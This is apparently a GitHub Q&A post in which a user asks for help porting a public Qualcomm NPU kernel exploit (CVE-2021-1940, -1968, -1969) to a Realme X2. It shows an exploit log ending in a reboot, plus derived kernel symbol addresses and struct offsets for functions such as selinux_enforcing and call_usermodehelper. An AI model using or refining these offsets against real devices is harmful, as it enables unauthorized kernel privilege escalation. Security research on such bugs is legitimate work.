Exploit for Qualcomm NPU bugs (CVE-2021-1940, CVE-2021-1968, CVE-2021-1969) #806
bitbounty85 asked this question in Q&A
I am trying the NPU exploit "https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Qualcomm/NPU" on a realme X2 device; the device specifications are given below.
Device Specifications:
Model: RMX1992
Processor: Qualcomm SDM730G AIE Octa-core
Storage: 4 GB RAM, 64 GB internal storage
Android_version: 10
Android_security_patch_level: 5 May 2021
kernel_version: 4.14.117
build_no: RMX1992EX_11_C.18
firmware: RMX1992EX_11_OTA_1180_all_4MQxOL7lVVxp.ozip
The phone is rebooting; the log is given below.
[+] host_irq_wq offset: ffffffc3ee54d418
RMX1992L1:/data/local/tmp $ [+] network_stats_buf (controlled data) address: 0xffffffc38f9e4000
[+] reallocation data initialized!
[ ] initializing reallocation threads, please wait...
[+] 4 reallocation threads ready!
[+] trigger uaf
[+] reallocation data initialized!
[ ] initializing reallocation threads, please wait...
[+] 8 reallocation threads ready!
<phone_reboots_here>
I extracted the kernel.elf from the firmware, found the addresses, and subtracted 0x80000 to get the offsets below.
#define BPF_PROG_RUN32 0xFFFFFF8008146068
#define INIT_TASK 0xFFFFFF8009D9CC00
#define HOST_IRQ_WQ 0xFFFFFF80089F9DF8
#define ION_DMA_BUF_VUNMAP 0xFFFFFF8008BDF5D0
#define BPF_CALL_BASE 0xFFFFFF8008144770
#define SELINUX_ENFORCING 0xFFFFFF800A4A1000
#define DO_TASK_DEAD 0xFFFFFF800806D580
#define MEMSET 0xFFFFFF80090A7200
#define MEMCMP 0xFFFFFF80090A6D04
#define ARGV_SPLIT 0xFFFFFF80090A78E8
#define CALL_USERMODEHELPER 0xFFFFFF8008050280
#define RUN_CMD_ENVP 0xFFFFFF8009DAE370
#define ION_ALLOC_FD 0xFFFFFF8008BDDDB0
//offsets to dma_buf and ion_buffer
#define PRIV_OFF 168
#define HEAP_OFF 32
#define OPS_OFF 56
#define MAP_OFF 16
#define UNMAP_OFF 24
#define CNT_OFF 136
From vmlinux I got the above offsets, and the structures from which I got these offsets are mentioned below.
struct dma_buf {
...
void* priv; // PRIV_OFF
...
};
struct ion_buffer {
...
struct ion_heap* heap; // HEAP_OFF
...
int kmap_cnt; // CNT_OFF
...
};
struct ion_heap {
...
struct ion_heap_ops* ops; // OPS_OFF
...
};
struct ion_heap_ops {
...
void* (*map_kernel)(struct ion_heap *, struct ion_buffer *); // MAP_OFF
void (*unmap_kernel)(struct ion_heap *, struct ion_buffer *); // UNMAP_OFF
...
};
Can you please help me, @m-y-myo?